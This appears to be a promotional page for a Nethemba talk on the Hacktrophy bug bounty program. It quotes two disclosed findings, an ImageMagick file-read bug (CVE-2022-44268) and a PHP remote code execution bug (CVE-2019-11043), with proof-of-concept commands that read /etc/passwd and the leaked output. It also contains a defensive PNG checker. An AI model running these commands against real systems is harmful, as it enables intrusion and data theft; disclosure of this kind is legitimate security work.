CEO of Nethemba - Slovak IT security company founded in 2007, primarily focused on web application security and various penetration tests.
The main advantage of bug bounty programs over traditional penetration tests and security audits:
Disclaimer: The customer explicitly agreed with publishing their findings
Remove button in the "Rules -> Exception" section.
hacktrophy is vulnerable to local file inclusion (LFI), due to an outdated version of ImageMagick being used (CVE-2022-44268). Proof-of-Concept: Log into app.hacktrophy.com and upload the attached `poc.png` as profile image (via "Account Settings"). Then open the "Application" tab in Chrome's "Developer Tools" and download the resulting image (see attached `screenshot.png`). Finally, run...
$ identify -verbose 658-jsbounty-thumb_poc.png | grep -A9999 "Raw profile type" | tail -n +4 | grep -v ":" | xxd -r -ps
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
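A defensive check for the ImageMagick finding above, added here as an example and not part of the original presentation: a small PNG chunk walker that validates chunk CRCs and flags text chunks whose keyword is "profile", the property a vulnerable ImageMagick build turns into a local file read. `build_png` is a hypothetical helper that only constructs a tiny test image for the check.

```python
"""Flag PNG text chunks that trigger the CVE-2022-44268 file read in old ImageMagick."""
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
TEXT_CHUNKS = {b"tEXt", b"zTXt", b"iTXt"}  # all three start with keyword + NUL


def iter_chunks(data: bytes):
    """Yield (type, payload) for each chunk; raise ValueError on a malformed file."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIGNATURE)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        crc = data[pos + 8 + length:pos + 12 + length]
        if len(body) != length or len(crc) != 4:
            raise ValueError("truncated chunk")
        if struct.pack(">I", zlib.crc32(ctype + body)) != crc:
            raise ValueError(f"bad CRC in {ctype!r} chunk")
        yield ctype, body
        pos += 12 + length
        if ctype == b"IEND":
            return


def text_keywords(data: bytes):
    """Return the keywords of every tEXt/zTXt/iTXt chunk in the file."""
    return [body.split(b"\x00", 1)[0].decode("latin-1")
            for ctype, body in iter_chunks(data) if ctype in TEXT_CHUNKS]


def suspicious_profile_chunks(data: bytes):
    """Keywords that a vulnerable ImageMagick would treat as a file to embed."""
    return [k for k in text_keywords(data) if k.lower() == "profile"]


def make_chunk(ctype: bytes, body: bytes) -> bytes:
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body))


def build_png(text_chunks):
    """Constructed 1x1 grayscale PNG with the given (keyword, text) tEXt chunks (test input only)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    png = PNG_SIGNATURE + make_chunk(b"IHDR", ihdr)
    for key, value in text_chunks:
        png += make_chunk(b"tEXt", key + b"\x00" + value)
    return png + make_chunk(b"IDAT", zlib.compress(b"\x00\x00")) + make_chunk(b"IEND", b"")
```

Run it over uploaded images before they reach ImageMagick; a non-empty result (or a ValueError from a corrupt file) is a reason to reject the upload.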
Remote Code Execution in https://cloud.nethemba.com via CVE-2019-11043. PoC:
wget "https://cloud.nethemba.com/index.php?a=/bin/cat%20/etc/passwd" -qO-
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
The bug bounty hunters spotted these vulnerabilities immediately (there is a direct incentive to be the first to report), often before official security patches were released.
Thanks to the Hacktrophy Bug bounty program, you are informed about vulnerabilities IMMEDIATELY - no need to wait for black hat hackers to exploit them with severe and unexpected consequences.
By Pavol Luptak
In this presentation, we'll discuss real-life scenarios in which Hacktrophy helped customers reveal serious security vulnerabilities.